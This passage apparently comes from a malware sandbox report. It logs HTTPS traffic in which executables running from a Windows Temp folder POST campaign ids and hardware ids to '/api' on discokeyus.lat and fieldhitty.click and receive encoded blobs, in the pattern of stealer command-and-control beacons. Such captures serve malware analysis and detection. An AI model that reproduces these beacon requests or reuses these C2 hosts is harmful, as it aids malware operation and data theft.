                                                                                                                                                                                                                                                              2024-12-22 01:18:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              42192.168.2.450186104.21.21.99443348C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:47 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 82
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:47 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=F14195A540BC0B98AC8923850305D13E
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:47 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=9ulq1pi8qnhcq1975gbl34cbtm; expires=Wed, 16 Apr 2025 19:05:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kPnhvsnfgWaT9wgnO2spxbE4K3lqqun9kxVtpzuYYIV49red2pFmT0mf7cPjshB7D7ZOc5rpbrOuG7h%2FlgHkr%2FocrRF8WGt9xgSh0bDKes%2BEDWgeOxAFeH1uhqhW5cZGHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47aa9b928cb4-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1775&rtt_var=683&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=980&delivery_rate=1582655&cwnd=189&unsent_bytes=0&cid=4a4953ad87803fcf&ts=917&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC214INData Raw: 64 30 0d 0a 43 73 44 6e 6e 7a 6a 58 4c 7a 48 62 65 39 4b 72 6e 63 6e 32 47 58 4e 59 7a 33 70 30 33 4d 6a 39 2b 53 6e 42 47 71 39 32 4a 68 78 52 75 38 58 71 47 75 30 4e 57 61 38 50 6f 70 48 42 35 71 6f 32 51 6d 44 36 56 45 62 74 2f 64 50 49 47 50 49 30 6e 6b 42 36 4d 32 57 6d 67 63 4d 58 73 30 70 58 39 52 36 71 7a 72 2f 6c 31 48 38 48 65 76 56 4b 57 50 36 74 33 38 4d 5a 76 44 62 55 56 46 4d 2b 4d 4f 4b 50 36 30 79 6e 46 57 33 30 4a 2f 32 61 70 66 7a 59 4b 30 4a 74 34 55 74 46 37 2b 62 4d 7a 33 58 75 61 64 73 54 52 33 46 57 37 35 58 2b 56 72 4e 41 58 50 55 65 71 73 36 2f 35 64 52 2f 42 33 72 31 53 6c 6a 2b 72 64 2f 44 47 62 78 48 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: d0CsDnnzjXLzHbe9Krncn2GXNYz3p03Mj9+SnBGq92JhxRu8XqGu0NWa8PopHB5qo2QmD6VEbt/dPIGPI0nkB6M2WmgcMXs0pX9R6qzr/l1H8HevVKWP6t38MZvDbUVFM+MOKP60ynFW30J/2apfzYK0Jt4UtF7+bMz3XuadsTR3FW75X+VrNAXPUeqs6/5dR/B3r1Slj+rd/DGbxH
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              43192.168.2.450189104.21.21.99443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:47 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 47
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:47 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:47 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=8fnrou1vb8fu7c3i771abga73n; expires=Wed, 16 Apr 2025 19:05:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ag6O6gf%2BGis9dYPc4IKoxh1Tutf4cNCFMj0BYMdi9EjYkRWnRIUlPp7g7YaujiYD9qXQWCyppaJ%2FIRv9VVl07blAhlrpxYb3xnAIx9Z%2B0OcO6xDmBMB0kVBnqMxI1X1tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47aafe28efa9-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1782&rtt_var=1081&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=945&delivery_rate=850072&cwnd=140&unsent_bytes=0&cid=d507674050ee0a4d&ts=788&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC244INData Raw: 31 63 63 32 0d 0a 59 73 53 79 5a 56 55 33 31 32 39 4a 54 4a 58 74 4b 6c 61 49 41 54 6b 46 53 53 4a 72 5a 34 77 4b 74 6d 38 37 4e 45 6a 68 73 6b 67 5a 35 73 52 48 62 77 50 37 54 54 6f 70 74 39 64 65 4a 50 31 6b 46 53 63 6f 52 6b 6c 64 36 6d 76 61 48 46 34 59 61 70 66 66 61 6c 69 69 30 77 6b 6d 55 76 74 4e 4c 44 53 33 31 33 45 74 71 6d 52 58 4a 33 4d 41 44 67 33 75 61 39 6f 4e 57 6c 38 6e 6b 64 34 72 43 71 6a 56 44 54 42 55 73 77 34 6c 49 66 43 49 54 7a 66 69 62 31 42 6f 49 55 39 4a 53 36 35 76 7a 45 30 42 46 67 57 45 78 69 6b 76 70 63 45 4f 64 30 72 37 46 47 73 70 2b 38 38 51 64 4f 6c 6b 57 32 6b 76 52 67 41 50 35 47 4c 53 44 46 39 65 4f 49 6a 55 49 41 71 6d 31 67 77 36 58 61 63 44 4c 79 62 37 6a 6b 55 33 71 69 30 62 59 44
                                                                                                                                                                                                                                                              Data Ascii: 1cc2YsSyZVU3129JTJXtKlaIATkFSSJrZ4wKtm87NEjhskgZ5sRHbwP7TTopt9deJP1kFScoRkld6mvaHF4Yapffalii0wkmUvtNLDS313EtqmRXJ3MADg3ua9oNWl8nkd4rCqjVDTBUsw4lIfCITzfib1BoIU9JS65vzE0BFgWExikvpcEOd0r7FGsp+88QdOlkW2kvRgAP5GLSDF9eOIjUIAqm1gw6XacDLyb7jkU3qi0bYD
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC1369INData Raw: 4d 41 55 55 57 39 57 74 63 63 53 45 4d 6e 6b 39 5a 71 48 2b 6a 4a 52 7a 42 5a 39 56 56 72 4a 76 75 42 54 54 66 6c 5a 46 70 6e 4f 55 38 4a 42 75 5a 67 30 41 64 57 57 53 57 4e 32 69 30 49 72 39 63 49 4d 46 32 7a 41 69 68 75 75 63 39 50 4c 4b 6f 37 47 30 63 37 51 77 6f 52 34 33 6d 55 45 68 64 50 61 6f 54 63 61 6c 6a 6d 31 67 6b 32 57 4c 55 66 49 79 58 38 69 6c 6f 2f 34 32 35 57 5a 79 5a 4b 42 67 62 75 62 39 34 48 56 6c 77 75 6a 74 30 73 41 4b 61 51 53 58 64 53 72 55 31 7a 62 74 53 4b 57 44 50 6d 64 52 6c 64 61 31 39 48 48 4b 35 76 32 45 30 42 46 69 4b 47 30 79 6b 4c 71 64 4d 50 50 45 65 31 48 79 30 6a 38 70 31 4f 4d 65 52 70 57 48 55 68 54 67 38 47 35 32 50 64 43 46 35 53 61 73 32 51 4c 52 6a 6d 69 45 63 57 57 4c 34 42 49 54 6e 33 7a 31 64 36 38 79 4e 63 61
                                                                                                                                                                                                                                                              Data Ascii: MAUUW9WtccSEMnk9ZqH+jJRzBZ9VVrJvuBTTflZFpnOU8JBuZg0AdWWSWN2i0Ir9cIMF2zAihuuc9PLKo7G0c7QwoR43mUEhdPaoTcaljm1gk2WLUfIyX8ilo/425WZyZKBgbub94HVlwujt0sAKaQSXdSrU1zbtSKWDPmdRlda19HHK5v2E0BFiKG0ykLqdMPPEe1Hy0j8p1OMeRpWHUhTg8G52PdCF5Sas2QLRjmiEcWWL4BITn3z1d68yNca
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC1369INData Raw: 4b 34 32 53 55 51 78 6c 52 4d 73 4f 49 61 69 71 6c 78 41 51 39 46 34 41 4f 4a 53 44 77 6d 51 67 72 70 48 6f 62 59 43 63 41 55 55 58 6a 61 64 77 4c 53 31 6b 6e 67 4e 34 6b 44 36 50 66 44 7a 64 56 75 41 67 76 4a 66 79 4d 52 54 44 34 61 56 74 76 4c 6b 45 44 44 36 34 6d 6c 41 70 42 46 6e 4c 44 34 54 30 4c 35 4f 55 45 4f 56 75 79 47 32 73 78 75 5a 59 49 4d 2b 59 6a 41 79 63 6d 53 41 77 41 34 57 6e 65 41 31 78 63 4a 6f 76 65 4b 52 4b 70 31 41 63 37 58 62 38 41 4a 53 72 2f 68 6b 4d 2f 37 47 4e 61 62 57 73 4f 53 51 4c 32 4b 49 78 4e 62 56 45 6d 6a 74 39 6f 4e 61 58 65 43 54 42 44 39 52 4a 6c 4e 37 65 49 52 48 53 79 49 31 64 75 4b 30 73 44 41 65 35 76 32 51 68 61 55 53 6d 4f 31 79 41 4f 6f 64 51 4c 50 6c 69 7a 44 53 77 71 38 70 31 4e 50 65 5a 76 47 79 6c 72 52 78
                                                                                                                                                                                                                                                              Data Ascii: K42SUQxlRMsOIaiqlxAQ9F4AOJSDwmQgrpHobYCcAUUXjadwLS1kngN4kD6PfDzdVuAgvJfyMRTD4aVtvLkEDD64mlApBFnLD4T0L5OUEOVuyG2sxuZYIM+YjAycmSAwA4WneA1xcJoveKRKp1Ac7Xb8AJSr/hkM/7GNabWsOSQL2KIxNbVEmjt9oNaXeCTBD9RJlN7eIRHSyI1duK0sDAe5v2QhaUSmO1yAOodQLPlizDSwq8p1NPeZvGylrRx
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC1369INData Raw: 6c 41 70 56 46 6e 4c 44 32 53 4d 53 71 4e 34 4f 4f 6c 4f 39 43 69 55 6a 2f 49 6c 44 4d 2b 31 6c 56 6d 38 6d 52 51 6f 45 36 6d 4c 47 44 6c 4a 63 4a 34 6d 51 5a 45 43 68 79 45 64 76 46 5a 49 42 41 6a 37 73 6e 56 35 30 39 53 31 43 4a 79 78 4d 53 56 32 75 61 39 73 45 56 6c 34 69 6a 4e 38 75 44 71 44 57 43 6a 4a 61 76 78 38 6a 49 50 71 45 52 7a 2f 34 59 31 5a 6a 4a 30 51 42 44 75 51 6f 6d 6b 31 65 54 6d 72 62 6b 42 38 4e 71 64 41 45 49 52 57 71 51 7a 4a 75 38 49 4d 49 62 4b 70 76 56 57 63 6b 54 41 55 4f 35 6d 6e 59 41 31 35 54 49 34 76 59 4f 41 47 69 32 41 59 35 57 72 51 4a 4c 69 76 7a 69 45 77 79 35 53 4d 56 4a 79 78 59 53 56 32 75 52 2f 4d 34 47 33 63 51 77 38 39 6b 47 65 62 58 43 33 63 4e 39 51 45 6f 49 76 2b 41 54 6a 33 6d 61 56 4a 73 4a 30 73 4e 43 65 64
                                                                                                                                                                                                                                                              Data Ascii: lApVFnLD2SMSqN4OOlO9CiUj/IlDM+1lVm8mRQoE6mLGDlJcJ4mQZEChyEdvFZIBAj7snV509S1CJyxMSV2ua9sEVl4ijN8uDqDWCjJavx8jIPqERz/4Y1ZjJ0QBDuQomk1eTmrbkB8NqdAEIRWqQzJu8IMIbKpvVWckTAUO5mnYA15TI4vYOAGi2AY5WrQJLivziEwy5SMVJyxYSV2uR/M4G3cQw89kGebXC3cN9QEoIv+ATj3maVJsJ0sNCed
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC1369INData Raw: 46 63 73 6b 64 63 6a 45 71 6a 64 43 44 39 64 76 41 77 76 4b 2f 71 4a 52 44 37 72 5a 46 56 70 49 77 42 48 52 65 6c 77 6c 46 55 5a 64 7a 71 59 77 6a 77 4e 68 39 30 49 64 30 72 37 46 47 73 70 2b 38 38 51 64 4f 4e 78 58 32 6f 35 53 51 34 4c 34 57 76 47 44 46 52 64 4f 49 54 66 4c 67 65 71 31 67 67 78 56 4c 41 48 4a 79 6e 79 68 45 63 34 71 69 30 62 59 44 4d 41 55 55 58 41 59 38 63 61 57 6c 67 68 6c 63 74 71 48 2b 6a 4a 52 7a 42 5a 39 56 56 72 4c 66 79 45 54 44 54 6d 59 31 39 71 4b 31 49 47 41 75 6c 68 33 78 39 54 55 53 32 49 32 43 45 50 6f 4d 49 4c 4f 55 65 77 48 7a 6c 75 75 63 39 50 4c 4b 6f 37 47 31 45 73 55 42 6b 47 72 46 6e 43 44 6b 39 64 4a 34 2b 51 4e 55 36 2f 6b 41 41 37 46 65 31 4e 4c 53 48 2b 6a 45 63 31 34 32 39 57 59 69 4a 46 43 41 50 71 59 74 34 4e
                                                                                                                                                                                                                                                              Data Ascii: FcskdcjEqjdCD9dvAwvK/qJRD7rZFVpIwBHRelwlFUZdzqYwjwNh90Id0r7FGsp+88QdONxX2o5SQ4L4WvGDFRdOITfLgeq1ggxVLAHJynyhEc4qi0bYDMAUUXAY8caWlghlctqH+jJRzBZ9VVrLfyETDTmY19qK1IGAulh3x9TUS2I2CEPoMILOUewHzluuc9PLKo7G1EsUBkGrFnCDk9dJ4+QNU6/kAA7Fe1NLSH+jEc1429WYiJFCAPqYt4N
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC1369INData Raw: 79 65 4d 30 43 68 33 45 64 76 46 62 59 4b 4b 43 2f 39 68 6b 51 37 37 57 64 4a 62 53 78 53 43 41 54 6c 5a 64 67 4e 56 46 73 67 67 74 6b 6e 44 4b 76 58 41 44 68 51 39 55 4e 72 4b 65 2f 50 45 48 54 4c 62 6c 42 72 63 42 70 4a 47 71 42 78 6c 41 70 56 46 6e 4c 44 30 43 41 46 72 4e 30 45 4f 46 61 6e 44 43 30 38 39 34 4a 43 4a 75 42 6f 58 6d 6f 6d 54 51 6f 44 36 47 50 59 48 31 42 57 4b 59 69 51 5a 45 43 68 79 45 64 76 46 5a 59 61 50 53 54 77 67 31 34 2f 36 32 42 4e 61 6a 73 41 52 30 58 2f 62 38 56 4e 41 55 41 36 6c 4e 63 31 54 72 2b 51 41 44 73 56 37 55 30 74 4a 2f 47 49 54 6a 72 34 5a 6c 31 6f 4a 45 6b 41 41 65 5a 72 31 41 6c 64 55 53 2b 41 33 43 45 48 70 64 38 44 50 6c 75 38 41 6d 74 67 74 34 68 51 64 4c 49 6a 65 6e 77 6f 54 41 52 46 38 53 62 4e 54 56 35 61 61
                                                                                                                                                                                                                                                              Data Ascii: yeM0Ch3EdvFbYKKC/9hkQ77WdJbSxSCATlZdgNVFsggtknDKvXADhQ9UNrKe/PEHTLblBrcBpJGqBxlApVFnLD0CAFrN0EOFanDC0894JCJuBoXmomTQoD6GPYH1BWKYiQZEChyEdvFZYaPSTwg14/62BNajsAR0X/b8VNAUA6lNc1Tr+QADsV7U0tJ/GITjr4Zl1oJEkAAeZr1AldUS+A3CEHpd8DPlu8Amtgt4hQdLIjenwoTARF8SbNTV5aa
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC281INData Raw: 59 35 76 41 4d 49 56 43 79 47 32 6b 62 39 49 46 47 4d 2f 77 6a 52 46 68 6c 41 41 59 66 72 6a 44 74 46 42 6c 52 4a 73 4f 49 61 68 57 68 30 41 41 74 51 37 49 42 4f 69 58 36 67 32 6f 37 37 58 56 59 61 43 68 52 41 45 6e 6c 5a 5a 52 44 47 56 45 79 77 34 68 71 4c 36 48 47 42 42 68 57 70 41 52 72 59 4c 65 49 58 6e 53 79 49 32 55 6e 4f 55 4d 5a 42 75 46 35 36 6b 30 42 54 78 54 44 32 7a 77 48 74 74 4d 52 50 46 69 35 48 42 56 75 72 39 73 61 5a 72 67 78 43 58 68 72 58 7a 5a 4c 72 6d 6d 55 56 57 42 50 61 70 57 51 63 6c 4c 6f 6b 42 56 33 44 66 56 4b 4b 44 7a 6c 69 55 73 69 36 53 52 6c 57 51 78 57 41 77 4c 2b 62 38 4d 43 47 52 68 71 6a 4a 42 79 4f 65 62 5a 41 43 78 45 6f 77 41 37 4b 62 65 77 42 6e 54 79 49 77 4d 6e 48 6b 4d 48 43 2b 6c 2b 78 55 42 2b 51 43 43 45 77 43
                                                                                                                                                                                                                                                              Data Ascii: Y5vAMIVCyG2kb9IFGM/wjRFhlAAYfrjDtFBlRJsOIahWh0AAtQ7IBOiX6g2o77XVYaChRAEnlZZRDGVEyw4hqL6HGBBhWpARrYLeIXnSyI2UnOUMZBuF56k0BTxTD2zwHttMRPFi5HBVur9saZrgxCXhrXzZLrmmUVWBPapWQclLokBV3DfVKKDzliUsi6SRlWQxWAwL+b8MCGRhqjJByOebZACxEowA7KbewBnTyIwMnHkMHC+l+xUB+QCCEwC
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC1369INData Raw: 32 63 35 61 0d 0a 78 2b 45 31 35 56 76 48 65 61 46 42 6c 41 61 74 75 43 5a 45 43 30 6b 46 39 33 45 72 59 66 4f 53 6a 30 6d 55 74 7a 31 46 31 38 66 53 5a 47 48 68 54 51 56 74 4d 58 56 46 41 39 6b 70 77 2f 41 36 6a 65 41 43 45 56 2b 30 30 6b 62 71 2b 32 43 48 79 71 58 42 55 6e 4d 77 42 52 52 64 74 72 32 67 4e 65 51 44 76 4f 39 7a 41 4e 6f 4d 63 57 64 78 76 31 43 32 74 32 70 38 45 49 4d 50 73 6a 41 7a 64 35 47 31 78 57 75 54 69 47 45 68 64 50 61 70 57 51 63 6c 4c 6f 6b 42 56 33 44 66 56 4b 4b 44 7a 6c 69 55 73 69 36 53 52 6c 57 51 56 48 44 77 44 70 65 4a 59 6a 55 6b 49 74 77 35 35 71 44 2b 61 49 50 6e 63 64 39 54 4a 6c 62 75 2f 50 45 48 54 66 59 46 56 70 4c 46 59 59 53 4d 42 76 30 67 68 65 52 6d 69 74 32 7a 34 48 35 70 35 48 4d 52 58 74 58 57 56 75 38 35 34
                                                                                                                                                                                                                                                              Data Ascii: 2c5ax+E15VvHeaFBlAatuCZEC0kF93ErYfOSj0mUtz1F18fSZGHhTQVtMXVFA9kpw/A6jeACEV+00kbq+2CHyqXBUnMwBRRdtr2gNeQDvO9zANoMcWdxv1C2t2p8EIMPsjAzd5G1xWuTiGEhdPapWQclLokBV3DfVKKDzliUsi6SRlWQVHDwDpeJYjUkItw55qD+aIPncd9TJlbu/PEHTfYFVpLFYYSMBv0gheRmit2z4H5p5HMRXtXWVu854
                                                                                                                                                                                                                                                              2024-12-22 01:18:48 UTC1369INData Raw: 42 78 5a 46 57 63 48 41 75 39 2b 78 42 70 57 47 51 53 31 38 52 51 2b 73 39 4d 4a 4f 56 4b 6a 48 47 74 67 74 34 41 49 62 4e 4d 6a 45 79 63 55 44 6b 6b 64 72 6a 43 55 4f 46 70 59 4a 49 54 47 4f 30 32 42 33 67 41 32 51 36 55 61 4a 47 48 5a 75 57 6c 30 70 43 4e 64 4a 33 4d 53 52 30 58 71 65 5a 52 56 43 51 52 78 31 6f 4e 39 55 50 54 50 53 53 34 56 6f 30 31 7a 66 4c 6e 50 57 6e 53 79 49 78 78 6b 4f 56 49 50 42 76 68 72 6b 7a 4e 6e 63 53 53 45 30 54 77 51 71 39 77 6d 4e 45 53 2f 4d 78 55 37 39 49 46 47 4d 2f 78 79 47 79 6c 72 54 30 6c 64 31 79 69 63 54 57 59 59 61 70 75 51 63 6b 43 54 30 77 6b 35 55 71 4d 63 5a 67 6e 35 69 45 6b 69 2b 6d 35 58 52 69 68 52 41 30 57 67 4b 4e 4a 4e 41 51 52 6b 77 39 51 37 51 50 36 41 56 57 77 41 35 6c 70 37 66 4f 6a 42 55 58 54 38
                                                                                                                                                                                                                                                              Data Ascii: BxZFWcHAu9+xBpWGQS18RQ+s9MJOVKjHGtgt4AIbNMjEycUDkkdrjCUOFpYJITGO02B3gA2Q6UaJGHZuWl0pCNdJ3MSR0XqeZRVCQRx1oN9UPTPSS4Vo01zfLnPWnSyIxxkOVIPBvhrkzNncSSE0TwQq9wmNES/MxU79IFGM/xyGylrT0ld1yicTWYYapuQckCT0wk5UqMcZgn5iEki+m5XRihRA0WgKNJNAQRkw9Q7QP6AVWwA5lp7fOjBUXT8


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              44192.168.2.450205104.21.89.1154437796C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:49 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 42
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:18:49 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 76 62 41 72 5a 2d 2d 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PvbArZ--&j=
                                                                                                                                                                                                                                                              2024-12-22 01:18:50 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:50 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=4acr1ae357rq3djmagg4i5gmqi; expires=Wed, 16 Apr 2025 19:05:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMdrz9SAjnpvJ1wHURdDSQKr0vti9ssHPrzpgi9V0WpWD9MmpX%2FBRj%2BccqD3ZhM3vnYFQBM64XazzlUVP%2FZI9%2Fla3%2BRGAP4WzaE0FoaWAYM0fBAc5f8MsAG4QW2pruyRKCiz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c47b91f2a43a0-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2047&min_rtt=2045&rtt_var=772&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=942&delivery_rate=1411992&cwnd=219&unsent_bytes=0&cid=e85ca01cf36eb25a&ts=935&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:50 UTC244INData Raw: 33 35 33 33 0d 0a 70 64 41 73 44 4f 70 62 71 6c 35 6b 51 46 70 48 4a 77 56 62 41 31 75 58 57 6e 61 4e 6b 56 50 36 2f 47 30 2b 35 50 47 31 65 65 6a 65 38 6c 6f 75 30 47 2b 47 66 42 63 6c 65 48 31 54 64 79 35 6d 64 37 55 37 45 71 2b 72 4e 5a 75 51 48 6c 76 49 30 38 4d 55 79 70 2b 32 54 57 43 5a 50 6f 5a 38 41 54 68 34 66 58 78 2b 65 57 59 31 74 57 42 55 36 50 73 78 6d 35 41 50 58 34 2b 65 78 52 57 4c 7a 62 78 4c 5a 49 38 34 7a 6a 38 49 4c 54 38 69 51 6d 51 78 62 54 4c 36 4d 68 75 76 76 58 47 66 68 6b 38 45 78 72 7a 51 44 59 6e 6f 73 56 39 6e 79 43 61 47 4a 55 59 6c 4e 47 55 64 4a 7a 70 6d 4f 66 73 38 45 75 62 35 4f 35 4b 59 44 6c 71 4f 67 64 77 66 67 4d 32 79 53 47 57 46 4d 64 6f 79 41 69 6f 30 4a 45 68 6b 65 53 39 35 38 69
                                                                                                                                                                                                                                                              Data Ascii: 3533pdAsDOpbql5kQFpHJwVbA1uXWnaNkVP6/G0+5PG1eeje8lou0G+GfBcleH1Tdy5md7U7Eq+rNZuQHlvI08MUyp+2TWCZPoZ8ATh4fXx+eWY1tWBU6Psxm5APX4+exRWLzbxLZI84zj8ILT8iQmQxbTL6MhuvvXGfhk8ExrzQDYnosV9nyCaGJUYlNGUdJzpmOfs8Eub5O5KYDlqOgdwfgM2ySGWFMdoyAio0JEhkeS958i
